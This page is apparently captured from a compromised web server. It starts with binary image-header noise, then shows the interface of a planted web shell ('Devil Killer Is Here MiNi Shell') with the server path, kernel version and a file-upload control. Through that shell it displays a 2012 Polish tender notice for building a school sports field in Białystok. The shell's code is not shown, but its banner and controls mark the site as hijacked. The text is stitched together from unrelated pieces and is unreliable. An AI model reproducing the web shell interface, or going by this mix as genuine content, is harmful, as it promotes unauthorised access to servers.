JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120523/167918-N-2012.html

<p class="kh_header"><b>Białystok: Budowa boiska szkolnego wielofunkcyjnego, bieżni, skoczni  w dal, wymiana nawierzchni placu wielofunkcyjnego, górki saneczkowej, wykonanie drenażu i odwodnienia terenu,   wykonanie oświetlenia oraz systemu monitoringu wizyjnego terenu boiska w Zespole Szkół Nr 1 im. Gen. Władysława Sikorskiego   w Białymstoku, przy ul. Leśnej 30</b><br>
<b>Numer ogłoszenia: 167918 - 2012; data zamieszczenia: 23.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Nr 1 , ul. Leśna 30, 15-559 Białystok, woj. podlaskie, tel. 85 7431 110, faks 85 7431 110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zespolszkolnr1.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa boiska szkolnego wielofunkcyjnego, bieżni, skoczni  w dal, wymiana nawierzchni placu wielofunkcyjnego, górki saneczkowej, wykonanie drenażu i odwodnienia terenu,   wykonanie oświetlenia oraz systemu monitoringu wizyjnego terenu boiska w Zespole Szkół Nr 1 im. Gen. Władysława Sikorskiego   w Białymstoku, przy ul. Leśnej 30.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot  zamówienia  obejmuje wykonanie:     
1)	wykonanie boiska wielofunkcyjnego  o wymiarach 42 x 21 m z  nawierzchnią poliuretanową   na elastycznej podbudowie, montaż piłkochwytów, bramek, koszy itp.
2)	wykonanie nawierzchni poliuretanowej na bieżni o wymiarach 80x5,05m,     
3)	wykonanie skoczni  w dal z nawierzchnią  poliuretanową na rozbiegu
4)	wymianę nawierzchni asfaltowej na placu wielofunkcyjnym,
5)	usypanie górki saneczkowej
6)	wykonanie utwardzenia parkingu dla samochodów osobowych (10 miejsc parkingowych)         -  z  nawierzchnią  z kostki brukowej na podbudowie z kruszyw
7)	drenażu i odwodnienia terenu boiska, bieżni oraz terenu z miejscami postojowymi
8)	wykonanie instalacji oświetlenia terenu boiska wraz z oświetleniem nocnym  
9)	wykonanie systemu monitoringu wizyjnego CCTV,

na terenie Zespołu Szkół Nr 1 im. Gen. Władysława Sikorskiego w Białymstoku przy ul. Leśnej 30.

2.  Szczegółowe rozwiązania i zakres robót określa dokumentacja projektowa, opracowana przez projektantów firmy: 2MStudio Pracownia Projektowa, 15-048 Białystok, ul. Skorupska 34/46, zawierająca załączniki, które  stanowią  integralną część niniejszej SIWZ, w tym: dokumentacja architektoniczna, projekty  wykonawcze,   specyfikacje  techniczne  wykonania i odbioru robót budowlanych,  przedmiary  robót   - załącznik nr 6  

3. Teren objęty przedmiotem zamówienia znajduje się przy ul. Leśnej 30 w Białymstoku na nieruchomości oznaczonej  w ewidencji  gruntów i budynków jako działka nr 1109/2   - obręb nr  20  Białystok.
     Zaleca się, aby Wykonawca dokonał wizji lokalnej terenu budowy i jego otoczenia. Koszty dokonania wizji  lokalnej terenu budowy poniesie Wykonawca.

4. W przypadku, gdy w dokumentacji projektowej zostały wskazane nazwy, znaki towarowe lub normy, aprobaty, specyfikacje czy systemy odniesienia, o których mowa w art. 29 ust.3 i art. 30 ust. 1-3 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od określonych w dokumentacji. W przypadku oferowania rozwiązań równoważnych w stosunku do rozwiązań określonych w dokumentacji projektowej, Wykonawca zobowiązany jest do wypełnienia wymogu wynikającego z art. 30 ust. 5 ustawy oraz podania wykazu dokumentów potwierdzających ich równoważność takich jak: certyfikaty, aprobaty techniczne, z podaniem nazwy podmiotu wydającego oraz terminu ważności dokumentu. 

5. Wykonawca, do realizacji przedmiotu zamówienia zapewni materiały własne, spełniające opisane  w dokumentacji  wymagania jakościowe, bezpieczeństwa i zgodne z normami. Wykonawca jest zobowiązany używać materiałów i urządzeń nowych, które ponadto są:
a)	oznakowane CE, co oznacza, że dokonano oceny ich zgodności z normą zharmonizowaną albo europejską aprobatą techniczną bądź krajową specyfikacją techniczną państwa członkowskiego Unii Europejskiej lub Europejskiego Obszaru Gospodarczego, uznaną przez Komisję Europejską za zgodną z wymaganiami podstawowymi, albo
b)	umieszczone w określonym przez Komisję Europejską wykazie wyrobów mających niewielkie znaczenie dla zdrowia i bezpieczeństwa, dla których producent wydał deklarację zgodności         z uznanymi regułami wiedzy technicznej, albo,
c)	oznakowane, z zastrzeżeniem art. 5 ust. 4 ustawy z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz.U. z 2004r. Nr 92 poz.881 ze zm.), znakiem budowlanym, określonym we wzorze zamieszczonym w załączniku nr 1 do niniejszej ustawy;
Materiały, dla których normy PN i BN przewidują posiadanie zaświadczenia o jakości lub atestu powinny być zaopatrzone przez producenta w taki dokument.

6.	Wykonawca zobowiązany jest ponadto do wykonania wszelkich prac pomocniczych                                i towarzyszących niezbędnych do prawidłowej realizacji przedmiotu zamówienia, w tym:
a)	zorganizowania oraz należytego zabezpieczenia miejsca realizacji zadania wraz  z zapleczem, w sposób zapewniający bezpieczeństwo osób przebywających na terenie obiektu i w jego obrębie przed dostępem osób trzecich oraz zapewnić właściwe warunki BHP, ochrony zdrowia  i p.poż przy wykonywaniu robót budowlanych. Sporządzenia planu bezpieczeństwa na terenie placu budowy zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003           w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (Dz.U. nr 120, poz.1126)
b)	utrzymywania miejsca wykonywanych prac w stanie wolnym od zbędnych przeszkód, usuwania na bieżąco zbędnych elementów z demontażu, materiałów, odpadów, śmieci, urządzeń prowizorycznych, które nie są już potrzebne;
c)	postępowania z odpadami zgodnie z obowiązującymi w tym zakresie przepisami prawa. Wykonawca jako wytwórca odpadów w rozumieniu art.3 ust. 3 pkt. 22 ustawy o odpadach ma obowiązek zagospodarowania powstałych podczas realizacji przedmiotu zadania odpadów zgodnie z ustawą o odpadach z dnia 27.04.2001r. (tj. Dz.U. z 2010r. Nr 185 poz. 1243) i ustawą Prawo ochrony środowiska z dnia 27.04.2001r. (Dz.U. z 2008r. Nr 25 poz. 150 ze zmianami);
d)	utrzymania ruchu publicznego w bezpośrednim sąsiedztwie terenu budowy, przez cały okres realizacji aż do dnia odbioru,  w tym dokonanie niezbędnych uzgodnień w tym zakresie;
e)	natychmiastowego usuwania  wszelkich szkód i awarii spowodowanych przez Wykonawcę,
f)	przed zgłoszeniem wykonanych robót do odbioru zobowiązany jest na własny koszt dokonać wszelkich przewidzianych przepisami prawa prób, odbiorów technicznych i niezbędnych badań oraz pomiarów przez uprawnione do tego jednostki  i sporządzić geodezyjną dokumentację   powykonawczą  
7.	Wykonawca zobowiązany jest  wykonywać wszelkie prace objęte przedmiotem zamówienia, przy dochowaniu staranności wynikającej z zawodowego charakteru prowadzonej przez niego działalności gospodarczej, zgodnie z obowiązującymi w tym zakresie przepisami prawa, normami, warunkami technicznymi wykonania i odbioru robót oraz sztuką budowlaną.   
8. Prace uciążliwe dla uczniów i dla funkcjonowania szkoły wykonywane podczas trwania roku szkolnego (tj. w miesiącach czerwiec,  wrzesień i październik 2012) należy wykonywać po godzinach pracy szkoły lub w dni wolne od zajęć lekcyjnych. Prace głośne i uciążliwe należy wykonywać wyłącznie po godzinach pracy szkoły (od godz. 15.00 do 22.00) oraz w dni wolne od zajęć (w  godz. od 7.00 do 22.00). Wszelkie niezbędne wyłączenia zasilania muszą być uzgadniane z kierownictwem Szkoły.
9. Wymagany okres gwarancji na wykonane roboty budowlane, materiały i nawierzchnię oraz zamontowane urządzenia:  
1)	Zamawiający wymaga udzielenia minimum 5 - letniej gwarancji na wykonane roboty stanowiące przedmiot zamówienia. 
2)	Na zamontowane urządzenia wchodzące w skład systemu monitoringu wizyjnego oraz nawierzchnię poliuretanową wymagana jest gwarancja producenta.
3)	Przedmiot zamówienia objęty będzie 3-letnim okresem rękojmi, licząc od dnia przekazania całości zamówienia protokołem końcowym odbioru robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje ewentualną możliwość udzielenia zamówień uzupełniających  w rozumieniu art. 67 ust. 1 pkt 6 ustawy Prawo Zamówień Publicznych w wysokości do 30 % zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.11.27.00-2, 45.23.32.50-6, 45.31.51.00-9, 45.23.21.30-2, 45.31.00.00-3, 45.31.61.00-6, 45.31.20.00-7, 45.23.24.52-5, 45.22.30.00-6, 36.40.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 5.000 zł (słownie: pięć tysięcy  złotych).
2.	Wadium może być wniesione w następujących formach:
-pieniądzu,
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowe,   z tym że poręczenie kasy jest zawsze  poręczeniem pieniężnym,
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami).

3.	Wadium wnoszone w formie pieniężnej należy wpłacić PRZELEWEM na rachunek bankowy         w Banku Pekao S.A.  rachunek nr  29  1240 2890 1111 0010 4552 2771 a dowód wpłaty wadium należy dołączyć do oferty.
4.	Wadium wnoszone w pozostałych formach należy złożyć w kasie Zespołu Szkół Nr 1 im. Gen. Władysława Sikorskiego  w Białymstoku, przy ul. Leśnej 30, do dnia 12.06.2012r. do godz. 16:15  (oryginał), a potwierdzenie wraz z kopią złożonego dokumentu należy załączyć do oferty. 
5.	Wadium musi być wniesione najpóźniej w terminie składania ofert, tj. do dnia  12 czerwca 2012 r. do godz. 16:15.   Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w oznaczonym terminie znajdzie się na koncie Zamawiającego.
6.	Wykonawca, który nie wniósł  wadium zostanie wykluczony z postępowania.
7.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 11.
8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. 
9.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
10.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium, na podstawie pkt 7, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń potwierdzających spełnianie warunków udziału w postępowaniu lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:            
a) odmówił podpisania umowy na warunkach określonych w ofercie,
b) nie wniósł zabezpieczenia należytego wykonania umowy
b) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku Wykonawca winien wykazać się realizacją w okresie ostatnich  5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie - zrealizował co najmniej 3 zamówienia na roboty budowlane na budowę boisk sportowych, z czego co najmniej jedno polegające na budowie boiska wielofunkcyjnego  z nawierzchnią poliuretanową  o wartości  nie mniejszej niż 150.000 tys. brutto każde, z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że do realizacji  zamówienia będzie dysponował osobami (kierownik budowy i kierownicy branżowi),  które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi: 
-  co najmniej 1 osoba o specjalności konstrukcyjno - budowlanej (kierownik budowy), 
- co najmniej 1 osoba o specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych, 
-  co najmniej 1 osoba o specjalności instalacyjnej w zakresie instalacji i urządzeń wodociągowych  i kanalizacyjnych - 1 osoba, 
wpisanymi na listę właściwej Izby Samorządu Zawodowego - zgodnie z wymogami ustawy Prawo Budowlane, w rozumieniu ustawy z dnia 07 lipca 1994 r. Prawo budowlane (tj. Dz. U. 2010 r. Nr 243 poz. 1623 z późn. zm.) lub uprawnionymi do sprawowania samodzielnej funkcji w budownictwie na podstawie odrębnych przepisów prawa,  
  
z podaniem informacji na temat ich kwalifikacji zawodowych, niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją   o podstawie do dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli  Wykonawca wykaże, iż  posiada środki finansowe lub zdolnością kredytową w wysokości mniejszej niż 300 000,00 zł, - informacja wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	Badania na zgodność z norma PN-EN 14877 lub aprobata techniczna ITB lub rekomendacja techniczna ITB, lub dokument równoważny wydany przez instytucję posiadającą uprawnienia do kontroli jakości - dla oferowanej nawierzchni
2)	Certyfikat FIFA 2 Star, względnie wyniki badań Specjalistycznego Laboratorium Sportowego np. Labosport, Isasport lub innego laboratorium badającego nawierzchnie sportowe, spełniające wymagania FIFA
3)	Autoryzacja producenta nawierzchni poliuretanowej (karta techniczna), wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię. 
4)	Atest PZH lub równoważny do oferowanej nawierzchni potwierdzający spełnienie przez produkt wymogów higienicznych</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1)	każdy wykonawca zobowiązany jest złożyć oddzielnie dokument określony  w rozdziale III.4.2)  tiret 2,
2)	warunki dotyczące posiadania wiedzy i doświadczenia oraz dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oraz sytuacji ekonomicznej i finansowej badane będą łącznie - dokumenty określone w rozdziale III.4.1 tiret 1,2,3,4 winien złożyć co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia;
3)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w rozdziale III.4.1) oraz oświadczenie o nie podleganiu wykluczeniu z postępowania określone   w rozdziale III.4.2). tiret 1 składa pełnomocnik wykonawców wspólnie ubiegających się    o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie.
2. Zgodnie z art. 26 ust 2b) i 2c) ustawy Pzp, wykonawca może polegać na wiedzy  i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając         w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia  (przedstawione  w formie oryginału lub notarialnie poświadczonej kopii) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia Wzór zobowiązania -  załącznik nr 4B do SIWZ. 
     Zobowiązanie do udostępnienia zasobów w trybie art. 26 ust. 2b ustawy Pzp winno być sporządzone zgodnie z zasadami reprezentacji podmiotu, który takie zobowiązanie podejmuje.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
